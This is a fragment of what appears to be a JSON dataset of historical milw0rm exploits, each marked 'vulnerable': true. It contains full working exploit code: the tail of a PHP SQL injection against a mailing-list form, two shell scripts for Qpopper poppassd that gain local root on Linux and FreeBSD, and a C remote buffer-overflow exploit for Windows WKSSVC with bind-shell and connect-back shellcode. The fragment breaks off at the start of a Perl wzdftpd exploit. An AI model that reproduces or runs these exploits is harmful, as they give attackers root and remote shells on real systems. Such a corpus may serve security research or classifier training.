die;\n\n}\n\n\n\n$sql=$your_email.\",'or'a'='a'/*@fakedomainname.com\"; //wow it's a beautiful query ;)\n\n\n\n$data='-----------------------------7d52b21b210554\n\nContent-Disposition: form-data; name=\"method\"\n\n\n\nremind_password\n\n-----------------------------7d52b21b210554\n\nContent-Disposition: form-data; name=\"list\"\n\n\n\nmaillistuser\n\n-----------------------------7d52b21b210554\n\nContent-Disposition: form-data; name=\"fromlist\"\n\n\n\nmaillist\n\n-----------------------------7d52b21b210554\n\nContent-Disposition: form-data; name=\"frommethod\"\n\n\n\nshowhtmllist\n\n-----------------------------7d52b21b210554\n\nContent-Disposition: form-data; name=\"email\"\n\n\n\n'.$sql.'\n\n-----------------------------7d52b21b210554\n\nContent-Disposition: form-data; name=\"submit\"\n\n\n\nOk\n\n-----------------------------7d52b21b210554--';\n\nif ($proxy=='')\n\n{$packet=\"POST \".$path.\"index.php HTTP/1.1\\r\\n\";}\n\nelse\n\n{$packet=\"POST http://\".$host.$path.\"index.php HTTP/1.1\\r\\n\";}\n\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\\r\\n\";\n\n$packet.=\"Referer: http://\".$host.$path.\"index.php?method=remind_password_form&list=maillistuser&fromlist=maillist&frommethod=showhtmllist\\r\\n\";\n\n$packet.=\"Accept-Language: en\\r\\n\";\n\n$packet.=\"Content-Type: multipart/form-data; boundary=---------------------------7d52b21b210554\\r\\n\";\n\n$packet.=\"Accept-Encoding: gzip, deflate\\r\\n\";\n\n$packet.=\"User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\\r\\n\";\n\n$packet.=\"Host: \".$host.\"\\r\\n\";\n\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\n\n$packet.=\"Connection: Keep-Alive\\r\\n\";\n\n$packet.=\"Cache-Control: no-cache\\r\\n\";\n\n$packet.=\"Cookie: globalUserId=1745493597; gustTimeOut=1\\r\\n\\r\\n\";\n\n$packet.=$data;\n\nshow($packet);\n\nsendpacket($packet);\n\n}\n\nelse\n\n{\n\necho '<br>Fill in requested fields, optionally specify a proxy...<br><br>';\n\n}\n\n?>\n\n\n\n# milw0rm.com [2005-09-24]",
1180        "vulnerable": true
1181    },
1182    {
1183        "exploit_id": 1229,
1184        "content": "#!/bin/sh\n\n# tested and working /str0ke\n\n###########################################################################\n\n# Linux Qpopper poppassd latest version local r00t exploit by kcope     ###\n\n# August 2005                                                           ###\n\n# Confidential - Keep Private!                                          ###\n\n###########################################################################\n\n\n\nPOPPASSD_PATH=/usr/local/bin/poppassd\n\n\n\necho \"\"\n\necho \"Linux Qpopper poppassd latest version local r00t exploit by kcope\"\n\necho \"\"\n\nsleep 2\n\numask 0000\n\nif [ -f /etc/ld.so.preload ]; then\n\necho \"OOPS /etc/ld.so.preload already exists.. exploit failed!\"\n\nexit\n\nfi\n\ncat > program.c << _EOF\n\n#include <unistd.h>\n\n#include <stdio.h>\n\n#include <sys/types.h>\n\n#include <stdlib.h>\n\n\n\nvoid _init()\n\n{\n\n if (!geteuid()) {\n\n setgid(0);\n\n setuid(0);\n\n remove(\"/etc/ld.so.preload\");\n\n execl(\"/bin/sh\",\"sh\",\"-c\",\"chown root:root /tmp/suid; chmod +s /tmp/suid\",NULL);\n\n }\n\n}\n\n\n\n_EOF\n\ngcc -o program.o -c program.c -fPIC\n\ngcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles\n\ncat > suid.c << _EOF\n\nint main(void) {\n\n       setgid(0); setuid(0);\n\n       unlink(\"/tmp/suid\");\n\n       execl(\"/bin/sh\",\"sh\",0); }\n\n_EOF\n\n\n\ngcc -o /tmp/suid suid.c\n\ncp libno_ex.so.1.0 /tmp/libno_ex.so.1.0\n\necho \"--- Now type ENTER ---\"\n\necho \"\"\n\n$POPPASSD_PATH -t /etc/ld.so.preload\n\necho /tmp/libno_ex.so.1.0 > /etc/ld.so.preload\n\nsu\n\nif [ -f /tmp/suid ]; then\n\necho \"IT'S A ROOTSHELL!!!\"\n\n/tmp/suid\n\nelse\n\necho \"Sorry, exploit failed.\"\n\nfi\n\n\n\n# milw0rm.com [2005-09-24]",
1185        "vulnerable": true
1186    },
1187    {
1188        "exploit_id": 123,
1189        "content": "/*\n\n *  Author: snooq\n\n *  Date: 14 November 2003  \n\n *\n\n *  +++++++++++++ THIS IS A PRIVATE VERSION +++++++++++++++\n\n *\n\n *  This is just slightly better than the one I posted to\n\n *  packetstorm....\n\n *\n\n *  The public version will crash 'services.exe' immediately\n\n *  while this one crash it only when u exit from shell....\n\n *\n\n *  I'm still trying to figure out a way to avoid the 'crash'\n\n *  all together... any ideas????\n\n *\n\n *  Let me know if you hav trouble compiling this shit...\n\n *  I hope this could be a good e.g for u to try Win32\n\n *  exploitation..\n\n *\n\n *  This code is crappy... if u know of a better way of doing\n\n *  things... pls tell me.......\n\n *\n\n *  Otherwise, if you guys r keen... I'll be more than happy\n\n *  to go thru this in details wif u all... Meanwhile..enjoy!\n\n *\n\n *  +++++++++++++++++++++++++++++++++++++++++++++++++\n\n */\n\n\n\n#pragma comment (linker,\"/NODEFAULTLIB:msvcprtd.lib\") \n\n#pragma comment (linker,\"/NODEFAULTLIB:libcmtd.lib\") \n\n#pragma comment (linker,\"/NODEFAULTLIB:libcmt.lib\") \n\n#pragma comment (linker,\"/NODEFAULTLIB:libcd.lib\") \n\n#pragma comment (lib,\"ws2_32\")\n\n#pragma comment (lib,\"msvcrt\")\n\n#pragma comment (lib,\"mpr\")\n\n#pragma warning (disable:4013)\n\n\n\n#include <winsock2.h>\n\n#include <windows.h>\n\n#include <process.h>\n\n#include <stdlib.h>\n\n#include <stdio.h>\n\n#include <lm.h>\n\n\n\n#define NOP\t0x90\n\n#define PORT\t24876\n\n#define KEY\t0x99999999\n\n\n\n#define ALIGN\t\t1\t// Between 0 ~ 3\n\n#define TARGET\t\t1\n\n#define INTERVAL\t3\n\n#define TIME_OUT\t20\n\n#define PORT_OFFSET_1\t198\n\n#define PORT_OFFSET_2\t193 \n\n#define IP_OFFSET\t186 \n\n#define SC_OFFSET\t20\t// Gap for some NOPs...\n\n#define RET_SIZE\t2026\t// Big enuff to take EIP... ;)\n\n\n\n#define SC_SIZE_1\tsizeof(bindport)\n\n#define SC_SIZE_2\tsizeof(connback)\n\n\n\n#define BSIZE\t2600\n\n#define SSIZE\t128\n\n\n\nextern char getopt(int,char **,char*);\n\nextern char *optarg;\n\nstatic int alarm_fired=0;\n\n\n\nHMODULE hMod;\n\nFARPROC fxn;\n\nHANDLE t1, t2;\n\n\n\nchar buff[BSIZE];\n\n\n\nstruct {\n\n\tchar *os;\n\n\tlong jmpesp;\n\n\tchar *dll;\n\n}\n\n\n\ntargets[] = {\n\n\t{\n\n\t\t\"Window 2000 (en) SP4\",\n\n\t\t0x77e14c29,\n\n\t\t\"user32.dll 5.0.2195.6688\" \n\n\t},\n\n\t{\n\n\t\t\"Window 2000 (en) SP1\",\n\n\t\t0x77e3cb4c,\n\n\t\t\"user32.dll 5.0.2195.1600\" \n\n\t},\n\n\t{\n\n\t\t\"For debugging only\",\n\n\t\t0x41424344,\n\n\t\t\"dummy.dll 5.0.2195.1600\" \n\n\t}\n\n}, v;\n\n\n\n/*\n\n * HD Moore's shellcode..... ;)\n\n */\n\n\n\nchar bindport[]=\n\n\t\"\\xeb\\x19\\x5e\\x31\\xc9\\x81\\xe9\\xa6\\xff\\xff\\xff\\x81\\x36\\x99\\x99\\x99\"\n\n\t\"\\x99\\x81\\xee\\xfc\\xff\\xff\\xff\\xe2\\xf2\\xeb\\x05\\xe8\\xe2\\xff\\xff\\xff\"\n\n\t\"\\x71\\xa1\\x99\\x99\\x99\\xda\\xd4\\xdd\\x99\\x7e\\xe0\\x5f\\xe0\\x7c\\xd0\\x1f\"\n\n\t\"\\xd0\\x3d\\x34\\xb7\\x70\\x3d\\x83\\xe9\\x5e\\x40\\x90\\x6c\\x34\\x52\\x74\\x65\"\n\n\t\"\\xa2\\x17\\xd7\\x97\\x75\\xe7\\x41\\x7b\\xea\\x34\\x40\\x9c\\x57\\xeb\\x67\\x2a\"\n\n\t\"\\x8f\\xce\\xca\\xab\\xc6\\xaa\\xab\\xb7\\xdd\\xd5\\xd5\\x99\\x98\\xc2\\xcd\\x10\"\n\n\t\"\\x7c\\x10\\xc4\\x99\\xf3\\xa9\\xc0\\xfd\\x12\\x98\\x12\\xd9\\x95\\x12\\xe9\\x85\"\n\n\t\"\\x34\\x12\\xc1\\x91\\x72\\x95\\x14\\xce\\xb5\\xc8\\xcb\\x66\\x49\\x10\\x5a\\xc0\"\n\n\t\"\\x72\\x89\\xf3\\x91\\xc7\\x98\\x77\\xf3\\x93\\xc0\\x12\\xe4\\x99\\x19\\x60\\x9f\"\n\n\t\"\\xed\\x7d\\xc8\\xca\\x66\\xad\\x16\\x71\\x09\\x99\\x99\\x99\\xc0\\x10\\x9d\\x17\"\n\n\t\"\\x7b\\x72\\xa8\\x66\\xff\\x18\\x75\\x09\\x98\\xcd\\xf1\\x98\\x98\\x99\\x99\\x66\"\n\n\t\"\\xcc\\xb9\\xce\\xce\\xce\\xce\\xde\\xce\\xde\\xce\\x66\\xcc\\x85\\x10\\x5a\\xa8\"\n\n\t\"\\x66\\xce\\xce\\xf1\\x9b\\x99\\xf8\\xb5\\x10\\x7f\\xf3\\x89\\xcf\\xca\\x66\\xcc\"\n\n\t\"\\x81\\xce\\xca\\x66\\xcc\\x8d\\xce\\xcf\\xca\\x66\\xcc\\x89\\x10\\x5b\\xff\\x18\"\n\n\t\"\\x75\\xcd\\x99\\x14\\xa5\\xbd\\xa8\\x59\\xf3\\x8c\\xc0\\x6a\\x32\\x10\\x4e\\x5f\"\n\n\t\"\\xdd\\xbd\\x89\\xdd\\x67\\xdd\\xbd\\xa4\\x10\\xe5\\xbd\\xd1\\x10\\xe5\\xbd\\xd5\"\n\n\t\"\\x10\\xe5\\xbd\\xc9\\x14\\xdd\\xbd\\x89\\xcd\\xc9\\xc8\\xc8\\xc8\\xd8\\xc8\\xd0\"\n\n\t\"\\xc8\\xc8\\x66\\xec\\x99\\xc8\\x66\\xcc\\xa9\\x10\\x78\\xf1\\x66\\x66\\x66\\x66\"\n\n\t\"\\x66\\xa8\\x66\\xcc\\xb5\\xce\\x66\\xcc\\x95\\x66\\xcc\\xb1\\xca\\xcc\\xcf\\xce\"\n\n\t\"\\x12\\xf5\\xbd\\x81\\x12\\xdc\\xa5\\x12\\xcd\\x9c\\xe1\\x98\\x73\\x12\\xd3\\x81\"\n\n\t\"\\x12\\xc3\\xb9\\x98\\x72\\x7a\\xab\\xd0\\x12\\xad\\x12\\x98\\x77\\xa8\\x66\\x65\"\n\n\t\"\\xa8\\x59\\x35\\xa1\\x79\\xed\\x9e\\x58\\x56\\x94\\x98\\x5e\\x72\\x6b\\xa2\\xe5\"\n\n\t\"\\xbd\\x8d\\xec\\x78\\x12\\xc3\\xbd\\x98\\x72\\xff\\x12\\x95\\xd2\\x12\\xc3\\x85\"\n\n\t\"\\x98\\x72\\x12\\x9d\\x12\\x98\\x71\\x72\\x9b\\xa8\\x59\\x10\\x73\\xc6\\xc7\\xc4\"\n\n\t\"\\xc2\\x5b\\x91\\x99\";\n\n\n\nchar connback[]=\n\n\t\"\\xeb\\x19\\x5e\\x31\\xc9\\x81\\xe9\\xab\\xff\\xff\\xff\\x81\\x36\\x99\\x99\\x99\"\n\n\t\"\\x99\\x81\\xee\\xfc\\xff\\xff\\xff\\xe2\\xf2\\xeb\\x05\\xe8\\xe2\\xff\\xff\\xff\"\n\n\t\"\\x71\\xa9\\x99\\x99\\x99\\xda\\xd4\\xdd\\x99\\x7e\\xe0\\x5f\\xe0\\x75\\x60\\x33\"\n\n\t\"\\xf9\\x40\\x90\\x6c\\x34\\x52\\x74\\x65\\xa2\\x17\\xd7\\x97\\x75\\xe7\\x41\\x7b\"\n\n\t\"\\xea\\x34\\x40\\x9c\\x57\\xeb\\x67\\x2a\\x8f\\xce\\xca\\xab\\xc6\\xaa\\xab\\xb7\"\n\n\t\"\\xdd\\xd5\\xd5\\x99\\x98\\xc2\\xcd\\x10\\x7c\\x10\\xc4\\x99\\xf3\\xa9\\xc0\\xfd\"\n\n\t\"\\x12\\x98\\x12\\xd9\\x95\\x12\\xe9\\x85\\x34\\x12\\xc1\\x91\\x72\\x95\\x14\\xce\"\n\n\t\"\\xbd\\xc8\\xcb\\x66\\x49\\x10\\x5a\\xc0\\x72\\x89\\xf3\\x91\\xc7\\x98\\x77\\xf3\"\n\n\t\"\\x91\\xc0\\x12\\xe4\\x99\\x19\\x60\\x9d\\xed\\x7d\\xc8\\xca\\x66\\xad\\x16\\x71\"\n\n\t\"\\x1a\\x99\\x99\\x99\\xc0\\x10\\x9d\\x17\\x7b\\x72\\xa8\\x66\\xff\\x18\\x75\\x09\"\n\n\t\"\\x98\\xcd\\xf1\\x98\\x98\\x99\\x99\\x66\\xcc\\x81\\xce\\xce\\xce\\xce\\xde\\xce\"\n\n\t\"\\xde\\xce\\x66\\xcc\\x8d\\x10\\x5a\\xa8\\x66\\xf1\\x59\\x31\\x91\\xa0\\xf1\\x9b\"\n\n\t\"\\x99\\xf8\\xb5\\x10\\x78\\xf3\\x89\\xc8\\xca\\x66\\xcc\\x89\\x1c\\x59\\xec\\xdd\"\n\n\t\"\\x14\\xa5\\xbd\\xa8\\x59\\xf3\\x8c\\xc0\\x6a\\x32\\x5f\\xdd\\xbd\\x89\\xdd\\x67\"\n\n\t\"\\xdd\\xbd\\xa4\\x10\\xc5\\xbd\\xd1\\x10\\xc5\\xbd\\xd5\\x10\\xc5\\xbd\\xc9\\x14\"\n\n\t\"\\xdd\\xbd\\x89\\xcd\\xc9\\xc8\\xc8\\xc8\\xd8\\xc8\\xd0\\xc8\\xc8\\x66\\xec\\x99\"\n\n\t\"\\xc8\\x66\\xcc\\xb1\\x10\\x78\\xf1\\x66\\x66\\x66\\x66\\x66\\xa8\\x66\\xcc\\xbd\"\n\n\t\"\\xce\\x66\\xcc\\x95\\x66\\xcc\\xb9\\xca\\xcc\\xcf\\xce\\x12\\xf5\\xbd\\x81\\x12\"\n\n\t\"\\xdc\\xa5\\x12\\xcd\\x9c\\xe1\\x98\\x73\\x12\\xd3\\x81\\x12\\xc3\\xb9\\x98\\x72\"\n\n\t\"\\x7a\\xab\\xd0\\x12\\xad\\x12\\x98\\x77\\xa8\\x66\\x65\\xa8\\x59\\x35\\xa1\\x79\"\n\n\t\"\\xed\\x9e\\x58\\x56\\x94\\x98\\x5e\\x72\\x6b\\xa2\\xe5\\xbd\\x8d\\xec\\x78\\x12\"\n\n\t\"\\xc3\\xbd\\x98\\x72\\xff\\x12\\x95\\xd2\\x12\\xc3\\x85\\x98\\x72\\x12\\x9d\\x12\"\n\n\t\"\\x98\\x71\\x72\\x9b\\xa8\\x59\\x10\\x73\\xc6\\xc7\\xc4\\xc2\\x5b\\x91\\x99\\x09\";\n\n\n\nvoid err_exit(char *s) {\n\n\tprintf(\"%s\\n\",s);\n\n\texit(0);\n\n}\n\n\n\n/*\n\n * Ripped from TESO code and modifed by ey4s for win32\n\n * and... lamer quoted it wholesale here..... =p\n\n */\n\n\n\nvoid doshell(int sock) {\n\n\tint l;\n\n\tchar buf[512];\n\n\tstruct timeval time;\n\n\tunsigned long ul[2];\n\n\n\n\ttime.tv_sec=1;\n\n\ttime.tv_usec=0;\n\n\n\n\twhile (1) {\n\n\t\tul[0]=1;\n\n\t\tul[1]=sock;\n\n\n\n\t\tl=select(0,(fd_set *)&ul,NULL,NULL,&time);\n\n\t\tif(l==1) {\n\n\t\t\tl=recv(sock,buf,sizeof(buf),0);\n\n\t\t\tif (l<=0) {\n\n\t\t\t\terr_exit(\"-> Connection closed...\\n\");\n\n\t\t\t}\n\n\t\t\tl=write(1,buf,l);\n\n\t\t\tif (l<=0) {\n\n\t\t\t\terr_exit(\"-> Connection closed...\\n\");\n\n\t\t\t}\n\n\t\t}\n\n\t\telse {\n\n\t\t\tl=read(0,buf,sizeof(buf));\n\n\t\t\tif (l<=0) {\n\n\t\t\t\terr_exit(\"-> Connection closed...\\n\");\n\n\t\t\t}\n\n\t\t\tl=send(sock,buf,l,0);\n\n\t\t\tif (l<=0) {\n\n\t\t\t\terr_exit(\"-> Connection closed...\\n\");\n\n\t\t\t}\n\n\t\t}\n\n\t}\n\n}\n\n\n\nvoid changeip(char *ip) {\n\n\tchar *ptr;\n\n\tptr=connback+IP_OFFSET;\n\n\t/* Assume Little-Endianess.... */\n\n\t*((long *)ptr)=inet_addr(ip)^KEY;\n\n}\n\n\n\nvoid changeport(char *code, int port, int offset) {\n\n\tchar *ptr;\n\n\tptr=code+offset;\n\n\tport^=KEY;\n\n\t/* Assume Little-Endianess.... */\n\n\t*ptr++=(char)((port>>8)&0xff);\n\n\t*ptr++=(char)(port&0xff);\n\n}\n\n\n\nvoid banner() {\n\n\tprintf(\"\\nWKSSVC Remote Exploit By Snooq [jinyean@hotmail.com]\\n\\n\");\n\n}\n\n\n\nvoid usage(char *s) {\n\n\tbanner();\n\n\tprintf(\"Usage: %s [options]\\n\",s);\n\n\tprintf(\"\\t-r\\tSize of 'return addresses'\\n\");\n\n\tprintf(\"\\t-a\\tAlignment size [0~3]\\n\");\n\n\tprintf(\"\\t-p\\tPort to bind shell to (in 'connecting' mode), or\\n\");\n\n\tprintf(\"\\t\\tPort for shell to connect back (in 'listening' mode)\\n\");\n\n\tprintf(\"\\t-s\\tShellcode offset from the return address\\n\");\n\n\tprintf(\"\\t-h\\tTarget's IP\\n\");\n\n\tprintf(\"\\t-t\\tTarget types. ( -H for more info )\\n\");\n\n\tprintf(\"\\t-H\\tShow list of possible targets\\n\");\n\n\tprintf(\"\\t-l\\tListening for shell connecting\\n\");\n\n\tprintf(\"\\t\\tback to port specified by '-p' switch\\n\");\n\n\tprintf(\"\\t-i\\tIP for shell to connect back\\n\");\n\n\tprintf(\"\\t-I\\tTime interval between each trial ('connecting' mode only)\\n\");\n\n\tprintf(\"\\t-T\\tTime out (in number of seconds)\\n\\n\");\n\n\tprintf(\"\\tNotes:\\n\\t======\\n\\t'-h' is mandatory\\n\");\n\n\tprintf(\"\\t'-i' is mandatory if '-l' is specified\\n\\n\");\n\n\texit(0);\n\n}\n\n\n\nvoid showtargets() {\n\n\tint i;\n\n\tbanner();\n\n\tprintf(\"Possible targets are:\\n\");\n\n\tprintf(\"=====================\\n\");\n\n\tfor (i=0;i<sizeof(targets)/sizeof(v);i++) {\n\n\t\tprintf(\"%d) %s\",i+1,targets[i].os);\n\n\t\tprintf(\" --> 0x%08x (%s)\\n\",targets[i].jmpesp,targets[i].dll);\n\n\t}\n\n\texit(0);\n\n}\n\n\n\nvoid sendstr(char *host) {\n\n\n\n\tWCHAR wStr[128];\n\n\tchar ipc[128], hStr[128];\n\n\n\n\tDWORD ret;\n\n\tNETRESOURCE NET;\n\n\n\n\thMod=LoadLibrary(\"netapi32.dll\");\n\n\tfxn=GetProcAddress(hMod,\"NetValidateName\");\n\n\n\n\t_snprintf(ipc,127,\"\\\\\\\\%s\\\\ipc$\",host);\n\n\t_snprintf(hStr,127,\"\\\\\\\\%s\",host);\n\n\tMultiByteToWideChar(CP_ACP,0,hStr,strlen(hStr)+1,wStr,sizeof(wStr)/sizeof(wStr[0]));\n\n\n\n\tNET.lpLocalName = NULL;\n\n\tNET.lpProvider = NULL;\n\n\tNET.dwType = RESOURCETYPE_ANY;\n\n\tNET.lpRemoteName = (char*)&ipc;\n\n\n\n\tprintf(\"-> Setting up $IPC session...(aka 'null session')\\n\");\n\n\tret=WNetAddConnection2(&NET,\"\",\"\",0);\n\n\n\n\tif (ret!=ERROR_SUCCESS) { err_exit(\"-> Couldn't establish IPC$ connection...\"); }\n\n\telse printf(\"-> IPC$ session setup successfully...\\n\");\n\n\n\n\tprintf(\"-> Sending exploit string...\\n\");\n\n\n\n\tret=fxn((LPCWSTR)wStr,buff,NULL,NULL,0);\n\n\n\n}\n\n\n\nVOID CALLBACK alrm_bell(HWND hwnd, UINT uMsg, UINT idEvent, DWORD dwTime ) {\n\n\terr_exit(\"-> I give up...dude.....\");\n\n}\n\n\n\nvoid setalarm(int timeout) {\n\n\n\n\tMSG msg = { 0, 0, 0, 0 };\n\n\tSetTimer(0, 0, (timeout*1000), (TIMERPROC)alrm_bell);\n\n\n\n\twhile(!alarm_fired) {\n\n\t\tif (GetMessage(&msg, 0, 0, 0) ) {\n\n\t\t\tif (msg.message == WM_TIMER) printf(\"-> WM_TIMER received...\\n\");\n\n\t\t\tDispatchMessage(&msg);\n\n\t\t}\n\n\t}\n\n\n\n}\n\n\n\nvoid resetalarm() {\n\n\tif (TerminateThread(t2,0)==0) {\n\n\t\terr_exit(\"-> Failed to reset alarm...\");\n\n\t}\n\n\tif (TerminateThread(t1,0)==0) {\n\n\t\terr_exit(\"-> Failed to kill the 'sending' thread...\");\n\n\t}\n\n}\n\n\n\nvoid do_send(char *host,int timeout) {\n\n\tt1=(HANDLE)_beginthread(sendstr,0,host);\n\n\tif (t1==0) { err_exit(\"-> Failed to send exploit string...\"); }\n\n\tt2=(HANDLE)_beginthread(setalarm,0,timeout);\n\n\tif (t2==0) { err_exit(\"-> Failed to set alarm clock...\"); }\n\n}\n\n\n\nint main(int argc, char *argv[]) {\n\n\n\n\tchar opt;\n\n\tchar *host, *ptr, *ip=\"\";\n\n\tstruct sockaddr_in sockadd;\n\n\tint i, i_len, ok=0, mode=0, flag=0;\n\n\tint align=ALIGN, retsize=RET_SIZE, sc_offset=SC_OFFSET;\n\n\tint target=TARGET, scsize=SC_SIZE_1, port=PORT;\n\n\tint timeout=TIME_OUT, interval=INTERVAL;\n\n\tlong retaddr;\n\n\n\n\tWSADATA wsd;\n\n\tSOCKET s1, s2;\n\n\n\n\tif (argc<2) { usage(argv[0]); }\n\n\n\n\twhile ((opt=getopt(argc,argv,\"a:i:I:r:s:h:t:T:p:Hl\"))!=EOF) {\n\n\t\tswitch(opt) {\n\n\t\t\tcase 'a':\n\n\t\t\talign=atoi(optarg);\n\n\t\t\tbreak;\n\n\n\n\t\t\tcase 'I':\n\n\t\t\tinterval=atoi(optarg);\n\n\t\t\tbreak;\n\n\n\n\t\t\tcase 'T':\n\n\t\t\ttimeout=atoi(optarg);\n\n\t\t\tbreak;\n\n\n\n\t\t\tcase 't':\n\n\t\t\ttarget=atoi(optarg);\n\n\t\t\tretaddr=targets[target-1].jmpesp;\n\n\t\t\tbreak;\n\n\n\n\t\t\tcase 'i':\n\n\t\t\tip=optarg;\n\n\t\t\tchangeip(ip);\n\n\t\t\tbreak;\n\n\n\n\t\t\tcase 'l':\n\n\t\t\tmode=1;\n\n\t\t\tscsize=SC_SIZE_2;\n\n\t\t\tbreak;\n\n\n\n\t\t\tcase 'r':\n\n\t\t\tretsize=atoi(optarg);\n\n\t\t\tbreak;\n\n\n\n\t\t\tcase 's':\n\n\t\t\tsc_offset=atoi(optarg);\n\n\t\t\tbreak;\n\n\t\t\t\n\n\t\t\tcase 'h':\n\n\t\t\tok=1;\n\n\t\t\thost=optarg;\n\n\t\t\tsockadd.sin_addr.s_addr=inet_addr(optarg);\n\n\t\t\tbreak;\n\n\n\n\t\t\tcase 'p':\n\n\t\t\tport=atoi(optarg);\n\n\t\t\tbreak;\n\n\n\n\t\t\tcase 'H':\n\n\t\t\tshowtargets();\n\n\t\t\tbreak;\n\n\n\n\t\t\tdefault:\n\n\t\t\tusage(argv[0]);\n\n\t\t\tbreak;\n\n\t\t}\n\n\t}\n\n\n\n\tif (!ok || (mode&&((strcmp(ip,\"\")==0)))) { usage(argv[0]); }\n\n\n\n\tmemset(buff,NOP,BSIZE);\n\n\n\n\tptr=buff+align;\n\n\tfor(i=0;i<retsize;i+=4) {\n\n\t\t*((long *)ptr)=retaddr;\n\n\t\tptr+=4;\n\n\t}\n\n\n\n\tif (WSAStartup(MAKEWORD(1,1),&wsd)!=0) {\n\n\t\terr_exit(\"-> WSAStartup error....\");\n\n\t}\n\n\n\n\tif ((s1=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {\n\n\t\terr_exit(\"-> socket() error...\");\n\n\t}\n\n\tsockadd.sin_family=AF_INET;\n\n\tsockadd.sin_port=htons((SHORT)port);\n\n\n\n\tptr=buff+retsize+sc_offset;\n\n\n\n\tif (BSIZE<(retsize+sc_offset+scsize)) err_exit(\"-> Bad 'sc_offset'..\");\n\n\n\n\tbanner();\n\n\n\n\tif (mode) {\n\n\n\n\t\tprintf(\"-> 'Listening' mode...( port: %d )\\n\",port);\n\n\n\n\t\tchangeport(connback, port, PORT_OFFSET_2);\n\n\t\tfor(i=0;i<scsize;i++) { *ptr++=connback[i]; }\n\n\n\n\t\tdo_send(host,timeout);\n\n\t\tSleep(1000);\n\n\n\n\t\tsockadd.sin_addr.s_addr=htonl(INADDR_ANY);\n\n\t\ti_len=sizeof(sockadd);\n\n\n\n\t\tif (bind(s1,(struct sockaddr *)&sockadd,i_len)<0) {\n\n\t\t\terr_exit(\"-> bind() error\");\n\n\t\t}\n\n\n\n\t\tif (listen(s1,0)<0) {\n\n\t\t\terr_exit(\"-> listen() error\");\n\n\t\t}\n\n\n\n\t\tprintf(\"-> Waiting for connection...\\n\");\n\n\n\n\t\ts2=accept(s1,(struct sockaddr *)&sockadd,&i_len);\n\n\n\n\t\tif (s2<0) {\n\n\t\t\terr_exit(\"-> accept() error\");\n\n\t\t}\n\n\n\n\t\tprintf(\"-> Connection from: %s\\n\\n\",inet_ntoa(sockadd.sin_addr));\n\n\n\n\t\tresetalarm();\n\n\t\tdoshell(s2);\n\n\n\n\t}\n\n\telse {\n\n\n\n\t\tprintf(\"-> 'Connecting' mode...\\n\",port);\n\n\n\n\t\tchangeport(bindport, port, PORT_OFFSET_1);\n\n\t\tfor(i=0;i<scsize;i++) { *ptr++=bindport[i]; }\n\n\n\n\t\tdo_send(host,timeout);\n\n\t\tSleep(1000);\n\n\n\n\t\tprintf(\"-> Will try connecting to shell now....\\n\");\n\n\n\n\t\ti=0;  \n\n\t\twhile(!flag) {\n\n\t\t\tSleep(interval*1000);\n\n\t\t\tif(connect(s1,(struct sockaddr *)&sockadd, sizeof(sockadd))<0) {\n\n\t\t\t\tprintf(\"-> Trial #%d....\\n\",i++);\n\n\t\t\t}\n\n\t\t\telse { flag=1; }\n\n\t\t}\n\n\n\n\t\tprintf(\"-> Connected to shell at %s:%d\\n\\n\",inet_ntoa(sockadd.sin_addr),port);\n\n\n\n\t\tresetalarm();\n\n\t\tdoshell(s1);\n\n\n\n\t}\n\n\n\n\treturn 0;\n\n\n\n}\n\n\n\n// milw0rm.com [2003-11-14]",
1190        "vulnerable": true
1191    },
1192    {
1193        "exploit_id": 1230,
1194        "content": "#!/bin/sh\n\n###########################################################################\n\n# FreeBSD Qpopper poppassd latest version local r00t exploit by kcope   ###\n\n# tested on FreeBSD 5.4-RELEASE                                         ###\n\n###########################################################################\n\n\n\nPOPPASSD_PATH=/usr/local/bin/poppassd\n\nHOOKLIB=libutil.so.4\n\n\n\necho \"\"\n\necho \"FreeBSD Qpopper poppassd latest version local r00t exploit by kcope\"\n\necho \"\"\n\nsleep 2\n\numask 0000\n\nif [ -f /etc/libmap.conf ]; then\n\necho \"OOPS /etc/libmap.conf already exists.. exploit failed!\"\n\nexit\n\nfi\n\ncat > program.c << _EOF\n\n#include <unistd.h>\n\n#include <stdio.h>\n\n#include <sys/types.h>\n\n#include <stdlib.h>\n\n\n\nvoid _init()\n\n{\n\n if (!geteuid()) {\n\n remove(\"/etc/libmap.conf\");\n\n execl(\"/bin/sh\",\"sh\",\"-c\",\"/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx\",NULL);\n\n }\n\n}\n\n\n\n_EOF\n\ngcc -o program.o -c program.c -fPIC\n\ngcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles\n\ncp libno_ex.so.1.0 /tmp/libno_ex.so.1.0\n\necho \"--- Now type ENTER ---\"\n\necho \"\"\n\n$POPPASSD_PATH -t /etc/libmap.conf\n\necho $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf\n\nsu\n\nif [ -f /tmp/xxxx ]; then\n\necho \"IT'S A ROOTSHELL!!!\"\n\n/tmp/xxxx\n\nelse\n\necho \"Sorry, exploit failed.\"\n\nfi\n\n\n\n# milw0rm.com [2005-09-24]",
1195        "vulnerable": true
1196    },
1197    {
1198        "exploit_id": 1231,
1199        "content": "######################################################\n\n# 0day0day0day0day0day0day0day\n\n# -------------------------------\n\n# wzdftpd remote exploit by kcope\n\n# nice call to popen(3) on custom \n\n# site commands...\n\n#\n\n# August 2005\n\n# confidential! keep private!\n\n# -------------------------------\n\n# 0day0day0day0day0day0day0day\n\n#\n\n#                    .___ _____  __             .___\n\n#__  _  __________ __| _// ____\\/  |_______   __| _/\n\n#\\ \\/ \\/ /\\___   // __ |\\   __\\\\   __\\____ \\ / __ | \n\n# \\     /  /    // /_/ | |  |   |  | |  |_> > /_/ | \n\n#  \\/\\_/  /_____ \\____ | |__|   |__| |   __/\\____ | \n\n#               \\/    \\/             |__|        \\/ \n\n#                                      \n\n#__  _  _______ _______   ____ ________\n\n#\\ \\/ \\/ /\\__  \\\\_  __ \\_/ __ \\\\___   /\n\n# \\     /  / __ \\|  | \\/\\  ___/ /    / \n\n#  \\/\\_/  (____  /__|    \\___  >_____ \\\n\n#              \\/            \\/      \\/ VER1\n\n######################################################\n\n\n\nuse Net::FTP;\n\n\n\nsub usage {\n\n\tprint \"usage: wzdftpdwarez.pl 